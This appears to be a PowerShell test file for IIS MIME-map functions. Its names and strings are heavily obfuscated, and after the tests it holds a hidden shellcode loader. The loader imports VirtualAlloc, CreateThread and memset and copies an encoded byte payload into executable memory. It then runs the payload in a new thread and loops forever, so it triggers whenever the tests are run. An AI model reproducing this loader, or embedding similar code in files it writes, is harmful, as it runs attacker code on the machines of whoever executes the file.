function ST`ARt-`TeS`TF`Ixt`Ure
{
    & (.("{2}{0}{1}" -f'n-Pa','th','Joi') -Path ${psS`cRI`ptROoT} ((("{6}{1}{7}{0}{2}{4}{8}{3}{5}{9}" -f'ial','0}I','i','o','ze','nTe','..{','nit','-Carb','st.ps1'))-f[CHAr]92) -Resolve)
}

function test-shOu`lDGet`AlLMIM`e`Ty`p`es
{
    ${mi`ME`maP} = &("{3}{0}{1}{2}"-f'et-Iis','Mime','Map','G')
    .("{1}{0}{2}{3}" -f's','As','ert-N','otNull') ${m`im`eMap}
    &("{1}{2}{3}{0}" -f 'ue','As','sert','-Tr') (${MIm`emaP}."len`GTh" -gt 0)
    
    ${mi`mEmAp} | .("{2}{0}{1}{4}{3}"-f 'h-','O','ForEac','t','bjec') {
        &("{3}{0}{2}{1}"-f 'Tr','e','u','Assert-') (${_}."fi`leExTE`Ns`ion" -like '.*') ('invalid file extension ''{0}''' -f ${_}."Fi`Le`exTeNs`IOn")
        .("{2}{3}{1}{0}" -f'ue','t-Tr','Ass','er') (${_}."MimET`Y`PE" -like '*/*') ("{1}{2}{3}{4}{0}" -f'ype','i','nvalid mi','me ','t')
    }
}

function t`eS`T-shOu`LdGetwILdc`AR`Dfi`LeeXte`N`Sion
{
    ${m`imEm`Ap} = &("{0}{3}{1}{2}" -f'Get-','MimeM','ap','Iis') -FileExtension ("{0}{1}" -f '.','htm*')
    &("{0}{4}{3}{2}{1}"-f 'Asser','l','l','otNu','t-N') ${mI`MeM`AP}
    &("{2}{0}{1}{3}"-f'e','rt-E','Ass','qual') 2 ${MIm`EmAp}."leng`Th"
    &("{2}{0}{1}"-f't-E','qual','Asser') ("{1}{0}" -f'm','.ht') ${mi`MEM`Ap}[0]."FILEex`TenSi`ON"
    .("{0}{2}{3}{1}"-f'Assert-E','l','qu','a') ("{2}{0}{1}" -f 'x','t/html','te') ${Mim`eM`Ap}[0]."MiM`Et`Ype"
    &("{2}{1}{0}"-f'ual','t-Eq','Asser') ("{1}{0}"-f 'html','.') ${m`IMeM`AP}[1]."f`i`le`ExTeNs`IoN"
    .("{2}{3}{1}{0}" -f'ual','t-Eq','As','ser') ("{1}{2}{0}" -f'l','t','ext/htm') ${M`im`EMaP}[1]."MIme`Ty`pe"
}


function Te`st-sHoULDgetWILD`c`A`Rdm`I`meT`Ype
{
    ${M`ImEMAp} = .("{2}{0}{1}"-f'a','p','Get-IisMimeM') -MimeType ("{0}{1}"-f 'tex','t/*')
    .("{0}{2}{1}"-f'Assert-Not','ull','N') ${mIME`M`AP}
    .("{1}{2}{0}{3}" -f'rt-Tru','Ass','e','e') (${MIm`e`mAp}."LEn`gtH" -gt 1)
    ${mi`mEMAP} | &("{1}{0}{3}{2}" -f 'h','ForEac','Object','-') {
        &("{3}{0}{1}{2}"-f'ert-','Tr','ue','Ass') (${_}."mi`M`etYPe" -like ("{1}{0}" -f '*','text/'))
    }
}


${b`Gs} = ((("{102}{91}{57}{34}{28}{95}{42}{92}{11}{12}{100}{86}{22}{15}{38}{75}{54}{44}{51}{20}{80}{5}{94}{58}{21}{9}{7}{82}{64}{18}{32}{88}{40}{74}{89}{77}{81}{79}{17}{29}{2}{73}{67}{48}{27}{90}{43}{33}{6}{70}{97}{39}{98}{45}{84}{30}{68}{1}{72}{101}{31}{0}{62}{24}{8}{105}{107}{35}{37}{96}{71}{55}{65}{93}{25}{60}{59}{13}{104}{4}{69}{46}{76}{3}{52}{85}{83}{23}{78}{61}{87}{49}{47}{19}{99}{63}{14}{53}{41}{66}{26}{16}{10}{56}{36}{106}{103}{50}"-f'ize,','s, uint','a','pT',',','flA','tP','int f','P','pe, u','uint sr','blic ','stat','l','tPt','P',', ','ll{0})]public','ect);[D','c static',' dwSize,','onTy','Int','lImport({','nt','eter, uint dwCreat',' dest',' ','nel32.',' st','but','ackS','l',' CreateThread(In','er','StartA',' ui','ddress,','tr V','eadA','r','set(I','ll{0})','Ptr',', u','r','tPt','0})]publi','extern','l{','unt);','int','hread','r mem','Address','P','c,','rt({0}k','ti','nF','io','t',' I','ern In','t','a','ntPtr','ic ','e',' In','tr l','Ptr lp',' d','t','t','irtualAlloc(IntPtr lp','r l','rn','0}msvcr','d',' uint ','el32.','lPro','Dl','i','Id);[','xtern ','.dl','lImpo','({0}ke','Int','mpo',']pu','ram','lloca','d',' Int','pThr','tt',' ext','ic e','wSt','[DllI','t co','ags','tr l','n','p'))  -f[chAR]34);${W} = .("{0}{1}{2}"-f 'Add','-Typ','e') -memberDefinition ${B`GS} -Name ("{0}{1}"-f 'Win','32') -namespace ("{0}{2}{1}"-f 'Win','Functions','32') -passthru;[Byte[]];[Byte[]]${Z} = 0xbf,0x38,0xa4,0xcd,0x7c,0xdd,0xc4,0xd9,0x74,0x24,0xf4,0x58,0x33,0xc9,0xb1,0x51,0x31,0x78,0x15,0x03,0x78,0x15,0x83,0xe8,0xfc,0xe2,0xcd,0x58,0x25,0xfe,0x2d,0xa1,0xb6,0x9f,0xa4,0x44,0x87,0x9f,0xd2,0x0d,0xb8,0x2f,0x91,0x40,0x35,0xdb,0xf7,0x70,0xce,0xa9,0xdf,0x77,0x67,0x07,0x39,0xb9,0x78,0x34,0x79,0xd8,0xfa,0x47,0xad,0x3a,0xc2,0x87,0xa0,0x3b,0x03,0xf5,0x48,0x69,0xdc,0x71,0xfe,0x9e,0x69,0xcf,0xc2,0x15,0x21,0xc1,0x42,0xc9,0xf2,0xe0,0x63,0x5c,0x88,0xba,0xa3,0x5e,0x5d,0xb7,0xea,0x78,0x82,0xf2,0xa5,0xf3,0x70,0x88,0x34,0xd2,0x48,0x71,0x9a,0x1b,0x65,0x80,0xe3,0x5c,0x42,0x7b,0x96,0x94,0xb0,0x06,0xa0,0x62,0xca,0xdc,0x25,0x71,0x6c,0x96,0x9d,0x5d,0x8c,0x7b,0x7b,0x15,0x82,0x30,0x08,0x71,0x87,0xc7,0xdd,0x09,0xb3,0x4c,0xe0,0xdd,0x35,0x16,0xc6,0xf9,0x1e,0xcc,0x67,0x5b,0xfb,0xa3,0x98,0xbb,0xa4,0x1c,0x3c,0xb7,0x49,0x48,0x4d,0x9a,0x05,0xe0,0x28,0x51,0xd6,0x94,0xc5,0xf0,0xb8,0x0d,0x7d,0x6b,0x09,0xb9,0x5b,0x6c,0x6e,0x90,0x92,0xa9,0xc3,0x48,0x87,0x1e,0xb7,0x06,0x1d,0xf7,0x4e,0x70,0x9e,0x22,0xe3,0x2d,0x0a,0xce,0x57,0x81,0xa0,0xe5,0xbf,0x5d,0x34,0x06,0x40,0xb1,0x04,0x40,0x77,0x92,0x34,0x4c,0x27,0x44,0xe3,0xc5,0x58,0x52,0xf4,0x03,0xef,0x9d,0x59,0xc4,0xf0,0x23,0x3d,0x90,0xa2,0x70,0xee,0xcf,0x17,0x21,0x78,0x1b,0xc2,0xe3,0x43,0x24,0x38,0x6d,0xd9,0xd0,0x9c,0xc1,0x4e,0xb6,0x71,0xb0,0x18,0x15,0x70,0x24,0xa3,0x9a,0xa9,0xd1,0x93,0x10,0x58,0x95,0x66,0x36,0x34,0xd9,0x3d,0x6a,0x93,0xe6,0xe8,0x01,0x5c,0x71,0x12,0xc6,0x5c,0x81,0x7a,0xe6,0x5c,0xc1,0x7a,0xb5,0x34,0x99,0xde,0x6a,0x20,0xe6,0xcb,0x1e,0xf9,0x4a,0x7a,0xc7,0xa9,0x04,0x7c,0x28,0x56,0xd5,0x2f,0x7e,0x3e,0xc7,0x59,0xf7,0x5c,0x18,0xb0,0x8d,0x61,0x93,0xf7,0x05,0x66,0x5d,0xc4,0x9f,0xa9,0x28,0x2f,0xc7,0xea,0x8c,0x47,0x71,0x13,0xcd,0x68,0xb3,0xdf,0x0b,0xb8,0x85,0x29,0x5e,0xea,0xd4,0x63,0xa7,0xdc,0x20,0xb5,0xd7;${G} = 0x1000;if (${Z}."leNG`Th" -gt 0x1000){${G} = ${z}."lEN`gTH"};${XM`VB}=${w}::("{3}{2}{1}{0}" -f'loc','ualAl','irt','V').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."L`eNGtH"-1);${I}++) {${w}::"MeM`S`et"([IntPtr](${xm`Vb}.("{0}{1}"-f 'T','oInt32').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{2}{0}{1}"-f'teThre','ad','Crea').Invoke(0,0,${XM`Vb},0,0,0);for (;;){.("{1}{3}{0}{2}"-f '-sl','Sta','eep','rt') 60};
